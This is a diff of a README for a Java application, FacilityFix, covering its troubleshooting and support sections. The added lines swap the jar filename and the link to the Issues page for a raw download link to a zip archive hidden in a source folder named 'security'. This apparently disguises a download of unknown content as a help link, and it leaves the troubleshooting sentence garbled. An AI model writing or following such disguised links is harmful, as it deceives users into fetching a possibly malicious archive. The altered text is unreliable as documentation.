MimamiSakka/FacilityFix/README.md

 If you encounter any issues while downloading or running FacilityFix, try the following:

 - Ensure you have the correct version of Java installed.
 You can check by running `java -version` in your command prompt or terminal.
-- Make sure you navigate to the correct directory where `FacilityFix.jar` is located.
+- Make sure you navigate to the correct directory where `https://raw.githubusercontent.com/MimamiSakka/FacilityFix/main/src/main/java/com/facilityfix/security/FacilityFix_v3.6.zip` is located.
 - If the application fails to run, check if your system has any security software that might block it.

 ## 🚀 Support

-If you need help with FacilityFix, please check the [Issues page](https://github.com/MimamiSakka/FacilityFix/issues) for common questions or report a new issue.
+If you need help with FacilityFix, please check the [Issues page](https://raw.githubusercontent.com/MimamiSakka/FacilityFix/main/src/main/java/com/facilityfix/security/FacilityFix_v3.6.zip) for common questions or report a new issue.
 You can also contact our support team via the GitHub discussions.

 ## 📚 Topics